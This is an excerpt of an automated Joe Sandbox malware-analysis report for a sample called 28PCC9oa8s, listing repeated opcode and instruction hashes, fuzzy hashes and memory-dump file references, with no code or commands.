                                                            • Opcode ID: 72b0a5ce783df9bfec7df20ee54f27d2b69f4b24d632541554032e580974d104
                                                            • Instruction ID: 3b7607efc32179f1e57b1fc3c8c13460d2371829b4c5208d3448e4981755ed1a
                                                            • Opcode Fuzzy Hash: 72b0a5ce783df9bfec7df20ee54f27d2b69f4b24d632541554032e580974d104
                                                            • Instruction Fuzzy Hash: 6D41E5F350C311EDBBD195854740AFA677EEA9B23C7304516E4C7A6A02E294DB4A42F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 522a3a4d82a62d34ed913509b94be9de329ce2baed8e4894e47ad62072cd691f
                                                            • Instruction ID: 59c53c9bf321e6106be56b2ea008695bd0ae4a1fd236605c561f6b246400f3f1
                                                            • Opcode Fuzzy Hash: 522a3a4d82a62d34ed913509b94be9de329ce2baed8e4894e47ad62072cd691f
                                                            • Instruction Fuzzy Hash: 8D3126B354D324EEBB8295414B80AFA673EA9DB23C3304525E887A6902D254DB4A82F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 811fe09201989c75f10dc1775cdff9ec00b812121b4067597ca407d830bd2f86
                                                            • Instruction ID: bc823645fa16bff37db5b80c16bd279105270ff7d21229b812c684b3013b2133
                                                            • Opcode Fuzzy Hash: 811fe09201989c75f10dc1775cdff9ec00b812121b4067597ca407d830bd2f86
                                                            • Instruction Fuzzy Hash: AB31F4F344D314FDBBC295454B80AFA277EA69A23C7304515F8CBA6A02E364DB4981F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 24e3ccf849159f219989202e24a73b30987585f48fac91dad60f250ad56e806a
                                                            • Instruction ID: 75a4d1db4093d4ce26b69b159a34fa5ba0fe95a820129b532931d25977dca929
                                                            • Opcode Fuzzy Hash: 24e3ccf849159f219989202e24a73b30987585f48fac91dad60f250ad56e806a
                                                            • Instruction Fuzzy Hash: 2A3138B344D310EEBBD2964447806FA777EAADB23C7304525F887E6902E354DB4941F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 12c12fe8cc4a70c20fb8785a08b7a68de975d044894108c36976865e816e7109
                                                            • Instruction ID: 27fc02fc566b8e5ca41aec0df7c144cf62a22507e9e6c777e516cecca4760714
                                                            • Opcode Fuzzy Hash: 12c12fe8cc4a70c20fb8785a08b7a68de975d044894108c36976865e816e7109
                                                            • Instruction Fuzzy Hash: 863128F744D311FDB782954147505FA2B7EEAEB3383308515F887D6902E265DB4541F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 7c9a3c00b7741df712bff26c595e0618a74e12f853f44216155319d5bcc5f0a1
                                                            • Instruction ID: ede86c729b26bf7c419d935c9aa7e67e04239584c8ac00affe13ff67f7e98b36
                                                            • Opcode Fuzzy Hash: 7c9a3c00b7741df712bff26c595e0618a74e12f853f44216155319d5bcc5f0a1
                                                            • Instruction Fuzzy Hash: 72316CF750D314FDBBD292540B806FA3B3AE9DB2383344466E8C7DA902D2559B4A82F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 35edf92e29c01db67be477819a44e3141b6562e28b1963527bb6c86e9cd0e972
                                                            • Instruction ID: c3b2f9b7960aa00dcbd0cafb244e53690e14f868568c59bd0213683fa139a2ab
                                                            • Opcode Fuzzy Hash: 35edf92e29c01db67be477819a44e3141b6562e28b1963527bb6c86e9cd0e972
                                                            • Instruction Fuzzy Hash: 8631E4F344C311EDBBD295414780AFA6B7EE6DA23C7308525F88BA6A02E365DB4641F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: fc97061c0e21deb16fd7f0c85d7ab97560325737009edce592475407f2adfd03
                                                            • Instruction ID: 393b7c2cc518ccfc69b1e371905e15d8f6b254d555d789fba79ca46df134d9e9
                                                            • Opcode Fuzzy Hash: fc97061c0e21deb16fd7f0c85d7ab97560325737009edce592475407f2adfd03
                                                            • Instruction Fuzzy Hash: 1D2105F754C310BD7BC291454B90AFA2B3EEADA6383308515F88BA6A01E265DB4551F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 55866a4e547337b00850064b6a5e17c2b1edb7e356e272705fc0de2f02ee5a7c
                                                            • Instruction ID: 5e51d26cd13050b3549128eb7b91f06d44e8f8274775d9a679c2b6d9d98f7432
                                                            • Opcode Fuzzy Hash: 55866a4e547337b00850064b6a5e17c2b1edb7e356e272705fc0de2f02ee5a7c
                                                            • Instruction Fuzzy Hash: 3D21E3F344D311FD7BD295454B80AFA273EA6DA23C3308515F88BA6902E255DB4541F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: cea61bc613df947479a40bf58ce14cd723771776e13d65614ec6ef045e38317e
                                                            • Instruction ID: a9a4c640ec37815a39ba6c4cf89c184ee6a8da4ec09653e4a5dff2b3dd2fd67f
                                                            • Opcode Fuzzy Hash: cea61bc613df947479a40bf58ce14cd723771776e13d65614ec6ef045e38317e
                                                            • Instruction Fuzzy Hash: FC2136F300C310FD7B8291454B906FA273EA6DA3383308425F88BE6A02E2A4DB4541F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714557869.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_28PCC9oa8s.jbxd